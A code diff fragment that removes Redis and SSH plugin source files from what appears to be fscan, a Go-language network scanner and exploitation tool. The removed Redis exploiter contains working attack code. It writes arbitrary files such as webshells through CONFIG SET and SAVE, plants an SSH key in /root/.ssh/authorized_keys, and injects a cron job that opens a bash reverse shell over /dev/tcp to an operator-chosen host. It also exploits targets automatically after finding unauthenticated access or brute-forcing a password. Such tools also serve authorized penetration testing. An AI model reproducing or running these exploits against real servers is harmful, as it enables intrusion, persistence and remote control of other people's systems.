-	timeout := time.Duration(common.Timeout) * time.Second
-	conn.conn.SetReadDeadline(time.Now().Add(timeout))
-	
-	// 读取所有数据
-	data, err := io.ReadAll(conn.conn)
-	if len(data) > 0 {
-		// 如果读到数据，忽略EOF错误
-		err = nil
-	}
-	
-	return string(data), err
-}
-
-// getConfig 获取Redis配置
-func (c *RedisConnector) getConfig(conn *RedisConnection) error {
-	// 获取数据库文件名
-	if err := c.sendCommand(conn, "CONFIG GET dbfilename"); err != nil {
-		return err
-	}
-	
-	response, err := c.readResponse(conn)
-	if err != nil {
-		return err
-	}
-	
-	// 解析响应
-	lines := strings.Split(response, "\r\n")
-	if len(lines) > 2 {
-		conn.config.DBFilename = lines[len(lines)-2]
-	}
-	
-	// 获取数据库目录
-	if err := c.sendCommand(conn, "CONFIG GET dir"); err != nil {
-		return err
-	}
-	
-	response, err = c.readResponse(conn)
-	if err != nil {
-		return err
-	}
-	
-	// 解析响应
-	lines = strings.Split(response, "\r\n")
-	if len(lines) > 2 {
-		conn.config.Dir = lines[len(lines)-2]
-	}
-	
-	return nil
-}
-
-// =============================================================================
-// Redis操作辅助函数
-// =============================================================================
-
-// ExecuteCommand 执行Redis命令
-func (c *RedisConnector) ExecuteCommand(conn *RedisConnection, command string) (string, error) {
-	if !conn.authenticated {
-		return "", fmt.Errorf("连接未认证")
-	}
-	
-	if err := c.sendCommand(conn, command); err != nil {
-		return "", err
-	}
-	
-	return c.readResponse(conn)
-}
-
-// SetConfig 设置Redis配置
-func (c *RedisConnector) SetConfig(conn *RedisConnection, key, value string) error {
-	if !conn.authenticated {
-		return fmt.Errorf("连接未认证")
-	}
-	
-	command := fmt.Sprintf("CONFIG SET %s %s", key, value)
-	if err := c.sendCommand(conn, command); err != nil {
-		return err
-	}
-	
-	response, err := c.readResponse(conn)
-	if err != nil {
-		return err
-	}
-	
-	if !strings.Contains(response, "OK") {
-		return fmt.Errorf("设置配置失败: %s", response)
-	}
-	
-	return nil
-}
-
-// SetKey 设置Redis键值
-func (c *RedisConnector) SetKey(conn *RedisConnection, key, value string) error {
-	if !conn.authenticated {
-		return fmt.Errorf("连接未认证")
-	}
-	
-	command := fmt.Sprintf("SET %s \"%s\"", key, value)
-	if err := c.sendCommand(conn, command); err != nil {
-		return err
-	}
-	
-	response, err := c.readResponse(conn)
-	if err != nil {
-		return err
-	}
-	
-	if !strings.Contains(response, "OK") {
-		return fmt.Errorf("设置键值失败: %s", response)
-	}
-	
-	return nil
-}
-
-// Save 保存Redis数据
-func (c *RedisConnector) Save(conn *RedisConnection) error {
-	if !conn.authenticated {
-		return fmt.Errorf("连接未认证")
-	}
-	
-	if err := c.sendCommand(conn, "SAVE"); err != nil {
-		return err
-	}
-	
-	response, err := c.readResponse(conn)
-	if err != nil {
-		return err
-	}
-	
-	if !strings.Contains(response, "OK") {
-		return fmt.Errorf("保存数据失败: %s", response)
-	}
-	
-	return nil
-}
-
-// RestoreConfig 恢复Redis配置
-func (c *RedisConnector) RestoreConfig(conn *RedisConnection, originalConfig *RedisConfig) error {
-	if originalConfig.DBFilename != "" {
-		if err := c.SetConfig(conn, "dbfilename", originalConfig.DBFilename); err != nil {
-			return fmt.Errorf("恢复dbfilename失败: %v", err)
-		}
-	}
-	
-	if originalConfig.Dir != "" {
-		if err := c.SetConfig(conn, "dir", originalConfig.Dir); err != nil {
-			return fmt.Errorf("恢复dir失败: %v", err)
-		}
-	}
-	
-	return nil
-}

Plugins/services/redis/exploiter.go

@@ -1,448 +0,0 @@
-package redis
-
-import (
-	"bufio"
-	"context"
-	"fmt"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-	"os"
-	"path/filepath"
-	"strings"
-)
-
-// RedisExploiter Redis利用器实现
-type RedisExploiter struct {
-	*base.BaseExploiter
-	connector *RedisConnector
-}
-
-// NewRedisExploiter 创建Redis利用器
-func NewRedisExploiter() *RedisExploiter {
-	exploiter := &RedisExploiter{
-		BaseExploiter: base.NewBaseExploiter("redis"),
-		connector:     NewRedisConnector(),
-	}
-	
-	// 添加利用方法
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *RedisExploiter) setupExploitMethods() {
-	// 1. 任意文件写入 - 只有提供了-rwp和(-rwc或-rwf)参数时才启用
-	if common.RedisWritePath != "" && (common.RedisWriteContent != "" || common.RedisWriteFile != "") {
-		fileWriteMethod := base.NewExploitMethod(base.ExploitFileWrite, "arbitrary_file_write").
-			WithDescription("利用Redis写入任意文件").
-			WithPriority(10).
-			WithConditions(). // Redis支持未授权访问，不需要凭据条件
-			WithHandler(e.exploitArbitraryFileWrite).
-			Build()
-		e.AddExploitMethod(fileWriteMethod)
-	}
-	
-	// 2. SSH密钥写入 - 只有提供了-rf参数时才启用
-	if common.RedisFile != "" {
-		sshKeyMethod := base.NewExploitMethod(base.ExploitFileWrite, "ssh_key_write").
-			WithDescription("写入SSH公钥到authorized_keys").
-			WithPriority(9).
-			WithConditions(). // Redis支持未授权访问，不需要凭据条件
-			WithHandler(e.exploitSSHKeyWrite).
-			Build()
-		e.AddExploitMethod(sshKeyMethod)
-	}
-	
-	// 3. Crontab定时任务 - 只有提供了-rs参数时才启用
-	if common.RedisShell != "" {
-		cronMethod := base.NewExploitMethod(base.ExploitCommandExec, "crontab_injection").
-			WithDescription("注入Crontab定时任务").
-			WithPriority(9).
-			WithConditions(). // Redis支持未授权访问，不需要凭据条件
-			WithHandler(e.exploitCrontabInjection).
-			Build()
-		e.AddExploitMethod(cronMethod)
-	}
-}
-
-// exploitArbitraryFileWrite 任意文件写入利用
-func (e *RedisExploiter) exploitArbitraryFileWrite(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// 检查是否配置了文件写入参数
-	if common.RedisWritePath == "" || (common.RedisWriteContent == "" && common.RedisWriteFile == "") {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "arbitrary_file_write", 
-			fmt.Errorf("未配置文件写入参数")), nil
-	}
-	
-	conn, err := e.connectToRedis(ctx, info, creds)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "arbitrary_file_write", err), nil
-	}
-	defer e.connector.Close(conn)
-	
-	redisConn := conn.(*RedisConnection)
-	result := base.CreateSuccessExploitResult(base.ExploitFileWrite, "arbitrary_file_write")
-	
-	// 备份原始配置
-	originalConfig := &RedisConfig{
-		DBFilename: redisConn.config.DBFilename,
-		Dir:        redisConn.config.Dir,
-	}
-	defer e.connector.RestoreConfig(redisConn, originalConfig)
-	
-	// 确定文件内容
-	var content string
-	if common.RedisWriteContent != "" {
-		content = common.RedisWriteContent
-	} else if common.RedisWriteFile != "" {
-		fileData, err := os.ReadFile(common.RedisWriteFile)
-		if err != nil {
-			return base.CreateFailedExploitResult(base.ExploitFileWrite, "arbitrary_file_write", 
-				fmt.Errorf("读取文件失败: %v", err)), nil
-		}
-		content = string(fileData)
-	}
-	
-	// 执行文件写入
-	dirPath := filepath.Dir(common.RedisWritePath)
-	fileName := filepath.Base(common.RedisWritePath)
-	
-	success, msg, err := e.writeFileToRedis(redisConn, dirPath, fileName, content)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "arbitrary_file_write", err), nil
-	}
-	
-	if !success {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "arbitrary_file_write", 
-			fmt.Errorf("写入失败: %s", msg)), nil
-	}
-	
-	base.AddOutputToResult(result, i18n.GetText("redis_webshell_written", common.RedisWritePath))
-	base.AddFileToResult(result, common.RedisWritePath)
-	
-	return result, nil
-}
-
-// exploitSSHKeyWrite SSH密钥写入利用
-func (e *RedisExploiter) exploitSSHKeyWrite(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	if common.RedisFile == "" {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "ssh_key_write", 
-			fmt.Errorf("未指定SSH密钥文件")), nil
-	}
-	
-	conn, err := e.connectToRedis(ctx, info, creds)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "ssh_key_write", err), nil
-	}
-	defer e.connector.Close(conn)
-	
-	redisConn := conn.(*RedisConnection)
-	result := base.CreateSuccessExploitResult(base.ExploitFileWrite, "ssh_key_write")
-	
-	// 备份原始配置
-	originalConfig := &RedisConfig{
-		DBFilename: redisConn.config.DBFilename,
-		Dir:        redisConn.config.Dir,
-	}
-	defer e.connector.RestoreConfig(redisConn, originalConfig)
-	
-	// 读取SSH密钥
-	keyData, err := e.readFirstNonEmptyLine(common.RedisFile)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "ssh_key_write", 
-			fmt.Errorf("读取SSH密钥失败: %v", err)), nil
-	}
-	
-	// 写入SSH密钥
-	success, msg, err := e.writeSSHKey(redisConn, keyData)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "ssh_key_write", err), nil
-	}
-	
-	if !success {
-		return base.CreateFailedExploitResult(base.ExploitFileWrite, "ssh_key_write", 
-			fmt.Errorf("写入失败: %s", msg)), nil
-	}
-	
-	base.AddOutputToResult(result, "成功写入SSH密钥到 /root/.ssh/authorized_keys")
-	base.AddFileToResult(result, "/root/.ssh/authorized_keys")
-	
-	return result, nil
-}
-
-// exploitCrontabInjection Crontab注入利用
-func (e *RedisExploiter) exploitCrontabInjection(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	if common.RedisShell == "" {
-		return base.CreateFailedExploitResult(base.ExploitCommandExec, "crontab_injection", 
-			fmt.Errorf("未指定反弹Shell地址")), nil
-	}
-	
-	conn, err := e.connectToRedis(ctx, info, creds)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitCommandExec, "crontab_injection", err), nil
-	}
-	defer e.connector.Close(conn)
-	
-	redisConn := conn.(*RedisConnection)
-	result := base.CreateSuccessExploitResult(base.ExploitCommandExec, "crontab_injection")
-	
-	// 备份原始配置
-	originalConfig := &RedisConfig{
-		DBFilename: redisConn.config.DBFilename,
-		Dir:        redisConn.config.Dir,
-	}
-	defer e.connector.RestoreConfig(redisConn, originalConfig)
-	
-	// 写入Crontab任务
-	success, msg, err := e.writeCrontab(redisConn, common.RedisShell)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitCommandExec, "crontab_injection", err), nil
-	}
-	
-	if !success {
-		return base.CreateFailedExploitResult(base.ExploitCommandExec, "crontab_injection", 
-			fmt.Errorf("写入失败: %s", msg)), nil
-	}
-	
-	base.AddOutputToResult(result, i18n.GetText("redis_cron_job_written", common.RedisShell))
-	
-	// 创建Shell信息
-	shellParts := strings.Split(common.RedisShell, ":")
-	if len(shellParts) == 2 {
-		result.Shell = &base.ShellInfo{
-			Type: "reverse",
-			Host: shellParts[0],
-			Port: 0, // 端口需要解析
-		}
-	}
-	
-	return result, nil
-}
-
-// exploitDataExtraction 数据提取利用
-func (e *RedisExploiter) exploitDataExtraction(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	conn, err := e.connectToRedis(ctx, info, creds)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitDataExtraction, "data_extraction", err), nil
-	}
-	defer e.connector.Close(conn)
-	
-	redisConn := conn.(*RedisConnection)
-	result := base.CreateSuccessExploitResult(base.ExploitDataExtraction, "data_extraction")
-	
-	// 获取所有键
-	keys, err := e.getAllKeys(redisConn)
-	if err == nil && len(keys) > 0 {
-		base.AddOutputToResult(result, i18n.GetText("redis_keys_found", strings.Join(keys[:min(10, len(keys))], ", ")))
-		result.Extra["keys"] = keys
-		
-		// 获取部分键值
-		for i, key := range keys {
-			if i >= 5 { // 限制只获取前5个键的值
-				break
-			}
-			value, err := e.getKeyValue(redisConn, key)
-			if err == nil && value != "" {
-				base.AddOutputToResult(result, fmt.Sprintf("%s = %s", key, value))
-			}
-		}
-	}
-	
-	return result, nil
-}
-
-// exploitInfoGathering 信息收集利用
-func (e *RedisExploiter) exploitInfoGathering(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	conn, err := e.connectToRedis(ctx, info, creds)
-	if err != nil {
-		return base.CreateFailedExploitResult(base.ExploitDataExtraction, "info_gathering", err), nil
-	}
-	defer e.connector.Close(conn)
-	
-	redisConn := conn.(*RedisConnection)
-	result := base.CreateSuccessExploitResult(base.ExploitDataExtraction, "info_gathering")
-	
-	// 获取Redis信息
-	infoResponse, err := e.connector.ExecuteCommand(redisConn, "INFO")
-	if err == nil {
-		lines := strings.Split(infoResponse, "\n")
-		for _, line := range lines {
-			if strings.Contains(line, "redis_version") || 
-			   strings.Contains(line, "os") || 
-			   strings.Contains(line, "arch_bits") {
-				base.AddOutputToResult(result, strings.TrimSpace(line))
-			}
-		}
-	}
-	
-	// 获取配置信息
-	base.AddOutputToResult(result, i18n.GetText("redis_config_info", fmt.Sprintf("Dir: %s", redisConn.config.Dir)))
-	base.AddOutputToResult(result, i18n.GetText("redis_config_info", fmt.Sprintf("DBFilename: %s", redisConn.config.DBFilename)))
-	
-	return result, nil
-}
-
-// =============================================================================
-// Redis操作辅助函数
-// =============================================================================
-
-// connectToRedis 连接到Redis
-func (e *RedisExploiter) connectToRedis(ctx context.Context, info *common.HostInfo, creds *base.Credential) (interface{}, error) {
-	conn, err := e.connector.Connect(ctx, info)
-	if err != nil {
-		return nil, err
-	}
-	
-	err = e.connector.Authenticate(ctx, conn, creds)
-	if err != nil {
-		e.connector.Close(conn)
-		return nil, err
-	}
-	
-	return conn, nil
-}
-
-// writeFileToRedis 通过Redis写入文件
-func (e *RedisExploiter) writeFileToRedis(conn *RedisConnection, dirPath, fileName, content string) (bool, string, error) {
-	// 设置目录
-	if err := e.connector.SetConfig(conn, "dir", dirPath); err != nil {
-		return false, "设置目录失败", err
-	}
-	
-	// 设置文件名
-	if err := e.connector.SetConfig(conn, "dbfilename", fileName); err != nil {
-		return false, "设置文件名失败", err
-	}
-	
-	// 写入内容
-	safeContent := strings.ReplaceAll(content, "\"", "\\\"")
-	safeContent = strings.ReplaceAll(safeContent, "\n", "\\n")
-	
-	if err := e.connector.SetKey(conn, "x", safeContent); err != nil {
-		return false, "设置键值失败", err
-	}
-	
-	// 保存
-	if err := e.connector.Save(conn); err != nil {
-		return false, "保存失败", err
-	}
-	
-	return true, "成功", nil
-}
-
-// writeSSHKey 写入SSH密钥
-func (e *RedisExploiter) writeSSHKey(conn *RedisConnection, keyData string) (bool, string, error) {
-	// 设置SSH目录
-	if err := e.connector.SetConfig(conn, "dir", "/root/.ssh/"); err != nil {
-		return false, "设置SSH目录失败", err
-	}
-	
-	// 设置文件名
-	if err := e.connector.SetConfig(conn, "dbfilename", "authorized_keys"); err != nil {
-		return false, "设置文件名失败", err
-	}
-	
-	// 写入密钥（前后添加换行符避免格式问题）
-	keyContent := fmt.Sprintf("\\n\\n\\n%s\\n\\n\\n", keyData)
-	if err := e.connector.SetKey(conn, "x", keyContent); err != nil {
-		return false, "设置键值失败", err
-	}
-	
-	// 保存
-	if err := e.connector.Save(conn); err != nil {
-		return false, "保存失败", err
-	}
-	
-	return true, "成功", nil
-}
-
-// writeCrontab 写入Crontab任务
-func (e *RedisExploiter) writeCrontab(conn *RedisConnection, shellTarget string) (bool, string, error) {
-	// 解析Shell目标
-	parts := strings.Split(shellTarget, ":")
-	if len(parts) != 2 {
-		return false, "Shell目标格式错误", fmt.Errorf("格式应为 host:port")
-	}
-	
-	shellHost, shellPort := parts[0], parts[1]
-	
-	// 先尝试Ubuntu路径
-	if err := e.connector.SetConfig(conn, "dir", "/var/spool/cron/crontabs/"); err != nil {
-		// 尝试CentOS路径
-		if err2 := e.connector.SetConfig(conn, "dir", "/var/spool/cron/"); err2 != nil {
-			return false, "设置Cron目录失败", err2
-		}
-	}
-	
-	// 设置文件名
-	if err := e.connector.SetConfig(conn, "dbfilename", "root"); err != nil {
-		return false, "设置文件名失败", err
-	}
-	
-	// 写入Crontab任务
-	cronTask := fmt.Sprintf("\\n* * * * * bash -i >& /dev/tcp/%s/%s 0>&1\\n", shellHost, shellPort)
-	if err := e.connector.SetKey(conn, "xx", cronTask); err != nil {
-		return false, "设置键值失败", err
-	}
-	
-	// 保存
-	if err := e.connector.Save(conn); err != nil {
-		return false, "保存失败", err
-	}
-	
-	return true, "成功", nil
-}
-
-// readFirstNonEmptyLine 读取文件的第一行非空内容
-func (e *RedisExploiter) readFirstNonEmptyLine(filename string) (string, error) {
-	file, err := os.Open(filename)
-	if err != nil {
-		return "", err
-	}
-	defer file.Close()
-	
-	scanner := bufio.NewScanner(file)
-	for scanner.Scan() {
-		line := strings.TrimSpace(scanner.Text())
-		if line != "" {
-			return line, nil
-		}
-	}
-	
-	return "", fmt.Errorf("文件为空或无内容")
-}
-
-// getAllKeys 获取所有Redis键
-func (e *RedisExploiter) getAllKeys(conn *RedisConnection) ([]string, error) {
-	response, err := e.connector.ExecuteCommand(conn, "KEYS *")
-	if err != nil {
-		return nil, err
-	}
-	
-	// 简单解析键列表（实际应该按Redis协议解析）
-	lines := strings.Split(response, "\n")
-	var keys []string
-	for _, line := range lines {
-		line = strings.TrimSpace(line)
-		if line != "" && !strings.HasPrefix(line, "*") && !strings.HasPrefix(line, "$") {
-			keys = append(keys, line)
-		}
-	}
-	
-	return keys, nil
-}
-
-// getKeyValue 获取键值
-func (e *RedisExploiter) getKeyValue(conn *RedisConnection, key string) (string, error) {
-	command := fmt.Sprintf("GET %s", key)
-	return e.connector.ExecuteCommand(conn, command)
-}
-
-// min 返回两个整数中的较小值
-func min(a, b int) int {
-	if a < b {
-		return a
-	}
-	return b
-}

Plugins/services/redis/plugin.go

@@ -1,282 +0,0 @@
-package redis
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// Redis插件：展示如何实现未授权访问检测和弱密码爆破
-// 作为NoSQL数据库插件的标准参考实现
-// 重点展示了自定义扫描逻辑和未授权访问检测模式
-
-// RedisPlugin Redis插件实现
-type RedisPlugin struct {
-	*base.ServicePlugin
-	exploiter *RedisExploiter
-}
-
-// NewRedisPlugin 创建Redis插件
-func NewRedisPlugin() *RedisPlugin {
-	// 插件元数据
-	metadata := &base.PluginMetadata{
-		Name:        "redis",
-		Version:     "2.0.0",
-		Author:      "fscan-team",
-		Description: "Redis数据库扫描和利用插件",
-		Category:    "service",
-		Ports:       []int{6379, 6380, 6381, 16379, 26379}, // Redis常用端口，包括默认端口、集群端口和备用端口
-		Protocols:   []string{"tcp"},
-		Tags:        []string{"database", "redis", "bruteforce", "exploit", "unauthorized"},
-	}
-	
-	// 创建连接器和服务插件
-	connector := NewRedisConnector()
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 创建Redis插件
-	plugin := &RedisPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewRedisExploiter(),
-	}
-	
-	// 设置能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,
-		base.CapUnauthorized,
-		base.CapFileWrite,
-		base.CapCommandExecution,
-		base.CapDataExtraction,
-		base.CapInformationLeak,
-	})
-	
-	return plugin
-}
-
-// Scan 重写扫描方法以支持未授权访问检测和后续利用
-func (p *RedisPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	common.LogDebug(i18n.GetText("redis_scan_start", target))
-
-	// 先检查未授权访问
-	unauthorizedResult := p.checkUnauthorizedAccess(ctx, info)
-	if unauthorizedResult != nil && unauthorizedResult.Success {
-		common.LogSuccess(i18n.GetText("redis_unauth_success", target))
-		
-		// 如果启用了利用功能，执行自动利用
-		if !common.DisableExploit { // 使用DisableExploit控制利用功能
-			go p.autoExploit(context.Background(), info, nil) // 未授权访问不需要凭据
-		}
-		
-		return unauthorizedResult, nil
-	}
-
-	// 如果未授权访问失败，在-nobr模式下进行基础服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-
-	// 执行基础的暴力破解扫描
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err
-	}
-	
-	common.LogSuccess(i18n.GetText("redis_weak_pwd_success", 
-		target, result.Credentials[0].Password))
-	
-	// 如果扫描成功并且启用了利用功能，执行自动利用
-	if result.Success && len(result.Credentials) > 0 && !common.DisableExploit {
-		go p.autoExploit(context.Background(), info, result.Credentials[0])
-	}
-	
-	return result, nil
-}
-
-// checkUnauthorizedAccess 检查未授权访问
-func (p *RedisPlugin) checkUnauthorizedAccess(ctx context.Context, info *common.HostInfo) *base.ScanResult {
-	conn, err := p.ServicePlugin.GetServiceConnector().Connect(ctx, info)
-	if err != nil {
-		return nil
-	}
-	defer p.ServicePlugin.GetServiceConnector().Close(conn)
-	
-	// 尝试无密码认证
-	err = p.ServicePlugin.GetServiceConnector().Authenticate(ctx, conn, nil)
-	if err != nil {
-		return nil
-	}
-	
-	// 未授权访问成功
-	return &base.ScanResult{
-		Success:     true,
-		Service:     "redis",
-		Credentials: []*base.Credential{}, // 未授权访问无凭据
-		Vulnerabilities: []base.Vulnerability{
-			{
-				ID:          "REDIS-UNAUTH",
-				Name:        "Redis未授权访问",
-				Severity:    "High",
-				Description: "Redis服务允许未授权访问，攻击者可以读取、修改数据或执行命令",
-				References:  []string{"https://redis.io/topics/security"},
-			},
-		},
-		Extra: make(map[string]interface{}),
-	}
-}
-
-// autoExploit 自动利用
-func (p *RedisPlugin) autoExploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	common.LogDebug(i18n.GetText("plugin_exploit_start", "Redis", target))
-	
-	// 执行利用
-	result, err := p.exploiter.Exploit(ctx, info, creds)
-	if err != nil {
-		common.LogError(i18n.GetText("plugin_exploit_failed", "Redis", err))
-		return
-	}
-	
-	if result != nil && result.Success {
-		common.LogSuccess(i18n.GetText("plugin_exploit_success", "Redis", result.Method))
-		base.SaveExploitResult(info, result, "Redis")
-	}
-}
-
-// Exploit 手动利用接口
-func (p *RedisPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *RedisPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *RedisPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// generateCredentials 重写凭据生成方法（Redis只需要密码）
-func (p *RedisPlugin) generateCredentials() []*base.Credential {
-	// Redis通常只需要密码，不需要用户名
-	return base.GeneratePasswordOnlyCredentials(common.Passwords)
-}
-
-// performServiceIdentification 执行Redis服务识别（-nobr模式）
-func (p *RedisPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接到Redis服务
-	conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
-	if err != nil {
-		return &base.ScanResult{
-			Success: false,
-			Error:   err,
-		}, nil
-	}
-	defer conn.Close()
-	
-	// 发送INFO命令获取Redis服务器信息
-	redisInfo, isRedis := p.identifyRedisService(conn)
-	if isRedis {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("redis_service_identified", target, redisInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "Redis",
-			Banner:  redisInfo,
-			Extra: map[string]interface{}{
-				"service": "Redis",
-				"port":    info.Ports,
-				"info":    redisInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为Redis，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为Redis服务"),
-	}, nil
-}
-
-// identifyRedisService 通过INFO命令识别Redis服务
-func (p *RedisPlugin) identifyRedisService(conn net.Conn) (string, bool) {
-	// 发送INFO命令
-	infoCmd := "INFO server\r\n"
-	
-	conn.SetWriteDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	if _, err := conn.Write([]byte(infoCmd)); err != nil {
-		return "", false
-	}
-	
-	// 读取响应
-	conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	response := make([]byte, 2048)
-	n, err := conn.Read(response)
-	if err != nil || n < 10 {
-		return "", false
-	}
-	
-	responseStr := string(response[:n])
-	
-	// 检查是否为Redis响应
-	if strings.Contains(responseStr, "redis_version:") {
-		// 提取Redis版本信息
-		lines := strings.Split(responseStr, "\r\n")
-		for _, line := range lines {
-			if strings.HasPrefix(line, "redis_version:") {
-				version := strings.TrimPrefix(line, "redis_version:")
-				return fmt.Sprintf("Redis版本: %s", version), true
-			}
-		}
-		return "Redis服务（版本未知）", true
-	} else if strings.Contains(responseStr, "-NOAUTH") {
-		// 需要认证的Redis
-		return "Redis服务（需要认证）", true
-	} else if strings.Contains(responseStr, "+PONG") || strings.Contains(responseStr, "$") {
-		// 通过RESP协议特征识别
-		return "Redis服务", true
-	}
-	
-	return "", false
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterRedisPlugin 注册Redis插件
-func RegisterRedisPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "redis",
-			Version:     "2.0.0",
-			Author:      "fscan-team",
-			Description: "Redis数据库扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{6379, 6380, 6381, 16379, 26379},
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"database", "redis", "bruteforce", "exploit", "unauthorized"},
-		},
-		func() base.Plugin {
-			return NewRedisPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("redis", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterRedisPlugin()
-}

Plugins/services/ssh/exploiter.go

@@ -1,37 +0,0 @@
-package ssh
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// SSHExploiter SSH利用器实现 - 最小化版本，不提供利用功能
-type SSHExploiter struct {
-	*base.BaseExploiter
-}
-
-// NewSSHExploiter 创建SSH利用器
-func NewSSHExploiter() *SSHExploiter {
-	exploiter := &SSHExploiter{
-		BaseExploiter: base.NewBaseExploiter("ssh"),
-	}
-	
-	// SSH插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *SSHExploiter) setupExploitMethods() {
-	// SSH插件不提供利用功能，-sshkey参数用于私钥文件认证而非命令执行
-	// SSH的价值在于弱密码发现，获取SSH访问权限本身就是目标
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *SSHExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// SSH插件不提供利用功能
-	return nil, nil
-}

Plugins/services/ssh/plugin.go

@@ -1,349 +0,0 @@
-package ssh
-
-import (
-	"context"
-	"fmt"
-	"io/ioutil"
-	"net"
-	"regexp"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-	"golang.org/x/crypto/ssh"
-)
-
-// SSHConnector SSH连接器实现
-type SSHConnector struct {
-	host    string
-	port    string
-}
-
-// NewSSHConnector 创建SSH连接器
-func NewSSHConnector() *SSHConnector {
-	return &SSHConnector{
-		// 移除timeout字段，统一使用Context超时
-	}
-}
-
-// Connect 连接到SSH服务
-func (c *SSHConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	// 保存主机和端口信息
-	c.host = info.Host
-	c.port = info.Ports
-	
-	// SSH连接在认证时才真正建立，这里返回配置信息
-	// 移除Timeout设置，统一使用Context超时控制
-	config := &ssh.ClientConfig{
-		Timeout:         0, // 禁用SSH库内部超时，使用Context控制
-		HostKeyCallback: ssh.InsecureIgnoreHostKey(), // 忽略主机密钥验证
-	}
-	
-	return config, nil
-}
-
-// Authenticate 认证
-func (c *SSHConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	config, ok := conn.(*ssh.ClientConfig)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 直接使用传入的Context，它已经包含了正确的超时设置
-	// 创建配置副本并设置认证方法
-	authConfig := *config
-	
-	if cred.KeyData != nil && len(cred.KeyData) > 0 {
-		// 密钥认证
-		signer, err := ssh.ParsePrivateKey(cred.KeyData)
-		if err != nil {
-			return fmt.Errorf("解析私钥失败: %v", err)
-		}
-		authConfig.User = cred.Username
-		authConfig.Auth = []ssh.AuthMethod{ssh.PublicKeys(signer)}
-	} else {
-		// 密码认证
-		authConfig.User = cred.Username
-		authConfig.Auth = []ssh.AuthMethod{ssh.Password(cred.Password)}
-	}
-	
-	// 构建目标地址
-	target := fmt.Sprintf("%s:%s", c.host, c.port)
-	
-	// 使用Context控制超时的SSH连接
-	type sshResult struct {
-		client *ssh.Client
-		err    error
-	}
-	
-	resultChan := make(chan sshResult, 1)
-	
-	go func() {
-		client, err := ssh.Dial("tcp", target, &authConfig)
-		resultChan <- sshResult{client: client, err: err}
-	}()
-	
-	// 等待结果或超时
-	select {
-	case result := <-resultChan:
-		if result.client != nil {
-			defer result.client.Close()
-		}
-		if result.err != nil {
